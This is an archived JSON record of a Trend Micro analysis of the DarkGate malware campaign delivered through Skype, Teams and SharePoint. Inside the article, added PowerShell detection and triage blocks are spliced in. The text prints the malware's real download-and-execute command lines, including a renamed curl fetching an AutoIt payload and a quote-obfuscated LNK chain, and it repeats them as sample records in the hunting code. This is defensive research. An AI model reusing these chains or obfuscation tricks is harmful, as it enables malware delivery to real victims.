{
	"id": "ecd26b1b-f656-4282-9058-e33e44c2cc09",
	"created_at": "2026-04-06T00:20:52.620489Z",
	"updated_at": "2026-04-10T13:12:13.857895Z",
	"deleted_at": null,
	"sha1_hash": "3579f44ba76afc230567858066c7a7eb2dde0533",
	"title": "DarkGate Opens Organizations for Attack via Skype, Teams",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1701726,
	"plain_text": "DarkGate Opens Organizations for Attack via Skype, Teams\r\nBy Trent Bessell, Ryan Maglaque, Aira Marcelo, David Walsh, Francesca Villasanta\r\nPublished: 2023-10-12 · Archived: 2026-04-05 23:42:43 UTC\r\nFrom July to September, we observed the DarkGate campaign (detected by Trend Micro as TrojanSpy.AutoIt.DARKGATE.AA) abusing instant messaging platforms to deliver a VBScript loader to victims. This script downloaded and executed a second-stage payload consisting of an AutoIt script containing the DarkGate malware code. It is unclear how the originating instant messaging accounts were compromised; we hypothesize either leaked credentials available on underground forums or a prior compromise of the parent organization.\r\nDarkGate has not been very active in the past couple of years. However, this year we have observed multiple campaign deployments, as reported by Truesec and Malwarebytes. Upon closely monitoring this campaign, we observed that most DarkGate attacks were detected in the Americas region, followed closely by Asia, the Middle East, and Africa.\r\nFigure 1. Distribution of the DarkGate campaign from August to September 2023\r\nBackground\r\nDarkGate is classified as a commodity loader that was first documented in late 2017. Versions of DarkGate have been advertised on a Russian-language eCrime forum since May 2023. 
Since then, an increase in the number of initial entry attacks using the malware has been observed.\r\nhttps://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html\r\nPage 1 of 11\n\nDarkGate has various features, including the ability to perform the following actions:\r\nExecute discovery commands (including directory traversal)\r\nSelf-update and self-manage\r\nImplement remote access software (such as Remote Desktop Protocol or RDP, hidden virtual network computing or hVNC, and AnyDesk)\r\nEnable cryptocurrency mining functionality (start, stop, and configure)\r\nPerform keylogging\r\nSteal information from browsers\r\nEscalate privileges\r\nDarkGate also uses a Windows-specific automation and scripting tool called AutoIt to deliver and execute its malicious capabilities. Despite being a legitimate tool, AutoIt has been frequently abused by other malware families for defense evasion and as an added obfuscation layer. Historically, however, none of the notable loaders like IcedID, Emotet, or Qakbot have been observed to abuse it, which makes it easier for researchers or security teams to link AutoIt-based activity to this campaign.\r\nComparing this latest variant of DarkGate with a sample that also abused AutoIt in 2018, we observed that the routine has changed slightly in terms of the initial stager and the addition of obfuscation to its command lines. The infection chain, however, largely remains the same.\r\nAttack overview\r\nIn the sample we studied, the threat actor abused a trusted relationship between two organizations to deceive the recipient into executing the attached VBScript file. 
Access to the compromised Skype account allowed the actor to hijack an existing messaging thread and name the attached files so that they matched the context of the chat history.\r\nThe victims received a message from a compromised Skype account containing a deceptive VBScript file whose name follows the format \u003cfilename.pdf\u003e www.skype[.]vbs. The run of spaces in the file name pushes the real extension out of view, so the user is tricked into believing the file is a .PDF document while the actual name ends in www.skype[.]vbs. In the sample we studied, the recipient knew the sender as someone who belonged to a trusted external supplier.\r\nFigure 3. Skype message with an embedded malicious attachment posing as a PDF file.\r\nThe VBScript, once executed by the victim, begins by creating a new folder named \u003cRandom Char\u003e, then copies the legitimate curl.exe into it under the same name, \u003cRandom Char\u003e.exe. The script then uses that copy to download the AutoIt3 executable and a .AU3 script from an external server hosting the files.\r\nFigure 4. Example of VBScript content; the script acts as the downloader for two files: a legitimate copy of the AutoIt executable and a maliciously compiled .au3 script.\r\nTrend Vision One™ detected the loading of the VBScript via its execution by the Windows-native wscript.exe. 
The script created the \u003cRandom Char\u003e directory and copied curl.exe to \u003cRandom Char\u003e.exe.\r\nLooking at Trend Vision One’s root cause analysis (RCA), we can observe that curl was used to retrieve the legitimate AutoIt application and the associated malicious fIKXNA.au3 (.au3 being the extension of an AutoIt version 3 script). Curl was executed via cmd.exe with the following parameters to retrieve the two files from the remote hosting server:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c mkdir c:\\zohn \u0026 cd /d c:\\zohn \u0026 copy C:\\windows\\system32\\curl.exe zohn.exe \u0026 zohn -o Autoit3.exe hxxp://reactervnamnat[.]com:80 \u0026 zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz \u0026 Autoit3.exe BzpXNT.au3\r\nEach \u0026-separated step runs unconditionally: create a working directory, copy the built-in curl.exe (shipped with Windows 10 1803 and later) under a new name, fetch the interpreter and the script, then run the script. The renamed binary is invoked as zohn without an extension; cmd.exe resolves it to zohn.exe in the current directory through PATHEXT, so a command-line search for the literal string curl.exe sees the copy step but not the download steps.\r\nIn another sample, the threat actor sent a link via a Microsoft Teams message. In this case, the organization’s Teams configuration allowed the victim to receive messages from external users, which made them a potential target for spam. Researchers from Truesec documented a similar DarkGate technique in early September. While the Skype routine masqueraded the VBS file as a PDF document, in the Teams variant the attackers concealed a .LNK file instead. Moreover, the sample that abused Teams came from an unknown, external sender.\r\nWe also observed a third delivery method for the VBScript loader, in which a .LNK file arrives in a compressed archive hosted on the originator’s SharePoint site. 
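One hunting approach for this stager, as an added example that is not part of the original article and not a Vision One query: the PowerShell below first strips cmd.exe quote-splitting (PIN\"G\" is run as ping, h\"t\"t\"p\" as http, the trick used by the .LNK stage shown further down), then scores process-creation records for the traits visible in the command lines on this page: a copy of curl.exe running under another name, a script host spawning cmd.exe, the AutoIt interpreter or an .au3 script on the command line, a curl download of a script or executable, and the || chaining with ping and echo filler. Field names (ParentImage, Image, OriginalFileName, CommandLine) follow Sysmon Event ID 1 and are an assumption about the telemetry source; the sample records are constructed from the command lines printed on this page, with the remote host kept defanged and the user profile shortened to a placeholder. It mirrors the logic of the two Vision One queries at the end of the article while also catching the renamed-curl download that a rule keyed on the image name curl.exe misses.

```powershell
# Added hunting example, not code from the original article. Field names follow
# Sysmon Event ID 1 (an assumption about the telemetry source); the sample records
# below are constructed from the command lines printed in the article, with the
# remote host left defanged and the user profile shortened to a placeholder.

function Expand-CmdObfuscation {
    param([Parameter(Mandatory)][string]$CommandLine)
    # cmd.exe drops each pair of double quotes while tokenising, so PIN\"G\" runs as
    # ping and h\"t\"t\"p\" becomes http. The caret (^) escape is discarded the same way,
    # so both are stripped to recover the command the shell actually executes.
    return ($CommandLine -replace '[\"^]', '')
}

function Test-DarkGateStager {
    param([Parameter(Mandatory)][hashtable]$Event)
    $cmd    = Expand-CmdObfuscation $Event.CommandLine
    $image  = Split-Path $Event.Image -Leaf
    $parent = Split-Path $Event.ParentImage -Leaf
    $reasons = @()
    # Trait 1: curl.exe (by PE original file name) running under another image name, e.g. zohn.exe.
    if ($Event.OriginalFileName -ieq 'curl.exe' -and $image -ine 'curl.exe') {
        $reasons += 'curl.exe running under a different image name'
    }
    # Trait 2: the script-host chain, wscript.exe or cscript.exe spawning cmd.exe.
    if ($parent -in @('wscript.exe', 'cscript.exe') -and $image -ieq 'cmd.exe') {
        $reasons += 'cmd.exe spawned by a script host'
    }
    # Trait 3: the AutoIt interpreter or an .au3 script referenced on the command line.
    if ($cmd -like '*autoit3.exe*' -or $cmd -like '*.au3*') {
        $reasons += 'AutoIt interpreter or .au3 script referenced'
    }
    # Trait 4: curl writing a script or executable, matched on the de-obfuscated line.
    if ($cmd -like '*curl*://*' -and $cmd -match '-o\\s+\\S+\\.(vbs|exe|au3)') {
        $reasons += 'curl download of a script or executable'
    }
    # Trait 5: || chaining with ping/echo filler, the LNK stage's way of sequencing its steps.
    if ($cmd -like '*||*' -and ($cmd -like '*ping*' -or $cmd -like '*echo*')) {
        $reasons += 'conditional-execution chain with ping/echo filler'
    }
    [pscustomobject]@{
        Image      = $image
        Suspicious = ($reasons.Count -ge 2)   # two independent traits, so a lone curl download stays quiet
        Reasons    = $reasons
        Decoded    = $cmd
    }
}

# Constructed records: the Skype-chain VBScript stage, the LNK stage, the renamed curl
# download the VBScript spawns, and a benign curl run that must not fire.
$events = @(
    @{ ParentImage = 'C:\\Windows\\System32\\wscript.exe'; Image = 'C:\\Windows\\System32\\cmd.exe'; OriginalFileName = 'Cmd.Exe'
       CommandLine = '\"C:\\Windows\\System32\\cmd.exe\" /c mkdir c:\\zohn \u0026 cd /d c:\\zohn \u0026 copy C:\\windows\\system32\\curl.exe zohn.exe \u0026 zohn -o Autoit3.exe hxxp://reactervnamnat[.]com:80 \u0026 zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz \u0026 Autoit3.exe BzpXNT.au3' },
    @{ ParentImage = 'C:\\Windows\\explorer.exe'; Image = 'C:\\Windows\\System32\\cmd.exe'; OriginalFileName = 'Cmd.Exe'
       CommandLine = '\"C:\\Windows\\System32\\cmd.exe\" /c hm3 || EChO hm3 \u0026 PIN\"G\" hm3 || cURl h\"t\"t\"p\":\"//\"1\"85.39\".1\"8\".17\"0\"/m\"/d\"2\"J\" -o C:\\Users\\user\\AppData\\Local\\Temp\\hm3.vbs \u0026 PIN\"G\" -n 4 hm3 || c\"sCR\"i\"Pt\" C:\\Users\\user\\AppData\\Local\\Temp\\hm3.vbs \u0026 e\"XI\"t' },
    @{ ParentImage = 'C:\\Windows\\System32\\cmd.exe'; Image = 'c:\\zohn\\zohn.exe'; OriginalFileName = 'curl.exe'
       CommandLine = 'zohn -o Autoit3.exe hxxp://reactervnamnat[.]com:80' },
    @{ ParentImage = 'C:\\Windows\\explorer.exe'; Image = 'C:\\Windows\\System32\\curl.exe'; OriginalFileName = 'curl.exe'
       CommandLine = 'curl -o update.exe https://example.com/update.exe' }
)

$events | ForEach-Object { Test-DarkGateStager $_ } | Format-Table Image, Suspicious, Reasons -AutoSize
```

Run as-is, the first three records score as suspicious and the benign curl run does not. Against live data, feed Sysmon Event ID 1 or EDR process-start records into Test-DarkGateStager and keep Expand-CmdObfuscation in front of every string match: the raw LNK command line contains neither http nor cscript as contiguous strings, so a rule that matches the raw text misses it.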
The victim is lured to navigate to the given SharePoint site and download a file named “Significant company changes September.zip”.\r\nThe .ZIP file contains the following .LNK files posing as PDF documents:\r\nCompany_Transformations.pdf.lnk\r\nRevamped_Organizational_Structure.pdf.lnk\r\nPosition_Guidelines.pdf.lnk\r\nFresh_Mission_and_Core_Values.pdf.lnk\r\nEmployees_Affected_by_Transition.pdf.lnk\r\nThe LNK file contains the following command. It relies on cmd.exe conditional execution: a command after || runs only if the previous one fails, while a command after \u0026 runs regardless. Keywords such as PING, cscript and the URL are split with pairs of double quotes, which cmd.exe strips before execution, so a naive string match for http or cscript on the raw command line fails:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c hm3 || EChO hm3 \u0026 PIN\"G\" hm3 || cURl h\"t\"t\"p\":\"//\"1\"85.39\".1\"8\".17\"0\"/m\"/d\"2\"J\" -o C:\\Users\\\u003cUSER\u003e\\AppData\\Local\\Temp\\hm3.vbs \u0026 PIN\"G\" -n 4 hm3 || c\"sCR\"i\"Pt\" C:\\Users\\\u003cUSER\u003e\\AppData\\Local\\Temp\\hm3.vbs \u0026 e\"XI\"t 'HlnLEG=OcCQmmcm\r\nWith the quotes removed the chain reads as follows: hm3 is not a valid command, so the || branch echoes and then pings the non-existent host hm3; that ping fails, so curl downloads hm3.vbs into the user’s Temp directory; the second ping fails in the same way, so cscript executes the downloaded file, and exit closes the console. The trailing 'HlnLEG=OcCQmmcm is filler appended to the exit command.\r\nOnce the download succeeds, the loader VBScript (hm3.vbs) is executed. It proceeds to copy and rename curl.exe from the System32 directory as “\u003cRandom Char\u003e.exe”, and that copy of curl is used to retrieve Autoit3.exe and the associated malicious DarkGate code.\r\nDarkGate AU3 script\r\nThe downloaded artifacts consist of a legitimate copy of the AutoIt interpreter and a maliciously compiled AutoIt script file that contains the DarkGate capabilities. The AU3 file performs two environment checks before loading the script; if either fails, the script terminates:\r\nThe Program Files directory must exist\r\nThe current username must not be “SYSTEM”\r\nOnce the environment checks pass, the program searches for a file with the \".au3\" extension to decrypt and execute the DarkGate payload. 
If the .AU3 file cannot be loaded, the program displays an error message box and terminates.\r\nAfter successfully executing the .AU3 file, the script spawns surrogate processes from C:\\Program Files (x86)\\. These include iexplore.exe, GoogleUpdateBroker.exe, and Dell.D3.WinSvc.UILauncher.exe, which are injected with shellcode to execute the DarkGate payload in memory.\r\nThe malware achieves persistence by dropping a randomly named LNK file into the user’s Startup folder, so that it runs at every logon of that user, at the following path:\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\u003crandom\u003e.lnk\r\nIn addition, execution creates a folder under the ProgramData directory named with a randomly generated seven-character string, which stores log and configuration data. To aid investigation of the DarkGate payload and processes, a tool by Telekom Security can be used to dump the config file.\r\nTable 1. Storing log and configuration data\r\nFile path | Details\r\n%ProgramData%\\{Generated 7 Characters}\\{Generated 7 Characters for logs folder}\\{date}.log | Encrypted key logs\r\n%ProgramData%\\{Generated 7 Characters}\\{Generated 7 Characters for logs folder}\\{Generated 7 Characters for \"settings\"} | Encrypted malware settings\r\nFigure 8. Snippet of the .AU3 script\r\nFigure 9. Extracted configuration\r\nPost-installation activities\r\nThe threat was observed acting as a downloader of additional payloads. 
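The persistence and staging artifacts described above (the random .lnk in the Startup folder, the seven-character folder tree under ProgramData, and the disguised-extension lure files) can be swept from a live host. The following PowerShell is an added triage example, not Trend Micro’s code or tooling: it resolves each Startup shortcut through the WScript.Shell COM object and flags targets that are AutoIt, an .au3 script, or something under ProgramData, AppData or Temp; lists candidate seven-character ProgramData folders with their nested logs folder, counting the dated .log files and any other file that could be the encrypted settings; and finds files whose names hide a .vbs or .lnk behind .pdf. The assumption that the seven random characters are alphanumeric is mine; the article only says they are randomly generated. On a clean host the script prints nothing.

```powershell
# Added host-triage example, not code from the original article. The seven-character
# pattern assumes alphanumeric names (the article says only \"randomly generated\").

function Get-StartupShortcutFindings {
    param([string]$StartupDir = (Join-Path $env:APPDATA 'Microsoft\\Windows\\Start Menu\\Programs\\Startup'))
    $shell = New-Object -ComObject WScript.Shell
    Get-ChildItem -Path $StartupDir -Filter '*.lnk' -ErrorAction SilentlyContinue | ForEach-Object {
        $lnk     = $shell.CreateShortcut($_.FullName)
        $target  = $lnk.TargetPath
        $lnkArgs = $lnk.Arguments
        # Suspicious when the shortcut runs an AutoIt interpreter, passes an .au3 script, or
        # points into ProgramData/AppData/Temp, where no installer-made Startup entry should live.
        $flag = ($target -like '*autoit3*') -or ($lnkArgs -like '*.au3*') -or
                ($target -like \"$env:ProgramData*\") -or ($target -like \"$env:LOCALAPPDATA*\") -or ($target -like \"$env:TEMP*\")
        [pscustomobject]@{ Shortcut = $_.Name; Target = $target; Arguments = $lnkArgs; Suspicious = $flag }
    }
}

function Get-ProgramDataStashFindings {
    param([string]$Root = $env:ProgramData)
    Get-ChildItem -Path $Root -Directory -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -match '^[A-Za-z0-9]{7}$' } | ForEach-Object {
        $outer = $_
        # Look for the nested seven-character logs folder; count dated .log files (keylog output)
        # and list any other file there, which is where the encrypted settings file would sit.
        Get-ChildItem -Path $outer.FullName -Directory -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -match '^[A-Za-z0-9]{7}$' } | ForEach-Object {
            $logs  = @(Get-ChildItem -Path $_.FullName -Filter '*.log' -File -ErrorAction SilentlyContinue)
            $other = @(Get-ChildItem -Path $_.FullName -File -ErrorAction SilentlyContinue | Where-Object { $_.Extension -ne '.log' })
            [pscustomobject]@{ Folder = $_.FullName; LogFiles = $logs.Count; SettingsCandidates = ($other | ForEach-Object Name) }
        }
    }
}

function Get-LureFileFindings {
    param([string[]]$Dirs = @((Join-Path $env:USERPROFILE 'Downloads'), $env:TEMP))
    foreach ($d in $Dirs) {
        Get-ChildItem -Path $d -Recurse -File -ErrorAction SilentlyContinue | Where-Object {
            # \".pdf\" followed by padding spaces or a second extension: name.pdf   www.skype.vbs, name.pdf.lnk
            $_.Name -match '\\.pdf(\\s+\\S*|\\.)(vbs|lnk)$'
        } | Select-Object FullName, Length, LastWriteTime
    }
}

Get-StartupShortcutFindings | Where-Object Suspicious | Format-List
Get-ProgramDataStashFindings | Format-Table -AutoSize
Get-LureFileFindings | Format-Table -AutoSize
```

The Startup check deliberately resolves the shortcut rather than trusting its name, because the file name is random and carries no signal; the target and arguments are what identify an AutoIt launcher. The ProgramData sweep will also surface legitimate seven-character folders, so treat its output as a list of places to inspect, and use the Telekom Security dumper mentioned above on any settings candidate it finds.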
After installation, DarkGate dropped files in directories including \u003c%appdata%/Adobe/\u003e, which helps it masquerade as legitimate software.\r\nThe dropped files were detected as variants of either DarkGate or Remcos, potentially as a means to strengthen the attackers’ foothold in the infected system. Here are some of the sample file names we found for these additional payloads:\r\nFolkevognsrugbrd.exe\r\nlogbackup_0.exe\r\nsdvbs.exe\r\nVaabenstyringssystem.exe\r\nSdvaners.exe\r\nDropper.exe\r\nConclusion and recommendations\r\nIn this case study, the attack was detected and contained before the actor could achieve their objectives. However, given the attacker’s previous pivot to advertising and leasing DarkGate, the objectives might vary depending on the affiliates involved. Cybercriminals can use these payloads to infect systems with various types of malware, including info stealers, ransomware, malicious and/or abused remote management tools, and cryptocurrency miners.\r\nIn the main case discussed, the Skype application was legitimately used to communicate with third-party suppliers, which made it easier to lure the users into accessing the malicious file. The recipient was just the initial target to gain a foothold in the environment. The goal is still to penetrate the whole environment, and depending on the threat group that bought or leased the DarkGate variant used, the threats can vary from ransomware to cryptomining. From our telemetry, we have seen DarkGate leading to the detection of tooling commonly associated with the Black Basta ransomware group.\r\nAs long as external messaging is allowed, or abuse of trusted relationships via compromised accounts goes unchecked, this initial-entry technique can be used through any instant messaging (IM) app. 
The introduction of any new application to an organization should be accompanied by measures for securing and limiting the organization’s attack surface. In this case, IM applications should be controlled by the organization to enforce rules such as blocking external domains, controlling attachments, and, if possible, implementing scanning. Multifactor authentication (MFA) is highly recommended to secure applications (including IM ones) against the compromise of valid credentials. This limits the potential proliferation of threats using these means.\r\nApplication allowlisting is a good defense mechanism to deploy to hosts through policy; it ensures that end users can only access and execute approved applications. In this instance, the AutoIt interpreter is rarely required to be resident or run on end-user machines.\r\nAlthough the arrival vector of the threat is nothing new, it shows that defenses should be applied as far left of the attack and infection chain as possible. Organizations should regularly train employees at every level to continuously raise security awareness. More importantly, the aim is to empower people to recognize and protect themselves against the latest threats. Hijacked threads, whether via email or instant message, rely on the recipient believing that the sender is who they say they are and can therefore be trusted. Empowering users to question this trust and to remain vigilant can therefore be an important factor in raising security awareness and confidence.\r\nThis case highlights the importance of in-depth, 24/7 monitoring, defense, and detection via Trend Micro™ Managed XDR services, included in Trend Service One™ services, as the responsiveness of our security analysts in detecting and containing threats before they progress to a high-severity compromise plays an important role against shifting tactics, techniques, and procedures (TTPs). 
Organizations should also consider the Trend Vision One™ platform, which offers the ability to detect and respond to threats across multiple security layers. It can isolate endpoints, often the source of infection, until they are fully cleaned or until the investigation is done.\r\nFor Trend Vision One customers, here are some Vision One search queries for DarkGate:\r\nprocessFilePath:wscript.exe AND objectFilePath:cmd.exe AND objectCmd:(au3 OR autoit3.exe OR curl) AND eventSubId: 2\r\nThis matches wscript.exe spawning cmd.exe with a command line that mentions the AutoIt interpreter, an .au3 script, or curl; cmd.exe in turn spawns curl.exe, which retrieves the legitimate AutoIt application and the associated malicious .au3 file (an AutoIt version 3 script). In the query, eventSubId: 2 indicates TELEMETRY_PROCESS_CREATE.\r\nparentFilePath:cmd.exe AND processFilePath:curl.exe AND processCmd:*http* AND objectFilePath:*vbs AND eventSubId:101\r\nThis checks for any VBScript download via curl: curl.exe, launched by cmd.exe with a URL on its command line, creating a file whose name ends in vbs. In the query, eventSubId: 101 indicates TELEMETRY_FILE_CREATE. Note that this second query keys on the image name curl.exe, which fits the .LNK stage; the VBScript stage that follows runs a renamed copy of curl to fetch Autoit3.exe and the .au3 file, so a companion rule keyed on the binary’s original file name or hash rather than its image path is needed to see those downloads.\r\nIndicators of Compromise (IOCs)\r\nDownload the indicators here.\r\nSource: https://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html"
	],
	"report_names": [
		"darkgate-opens-organizations-for-attack-via-skype-teams.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434852,
	"ts_updated_at": 1775826733,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3579f44ba76afc230567858066c7a7eb2dde0533.pdf",
		"text": "https://archive.orkl.eu/3579f44ba76afc230567858066c7a7eb2dde0533.txt",
		"img": "https://archive.orkl.eu/3579f44ba76afc230567858066c7a7eb2dde0533.jpg"
	}
}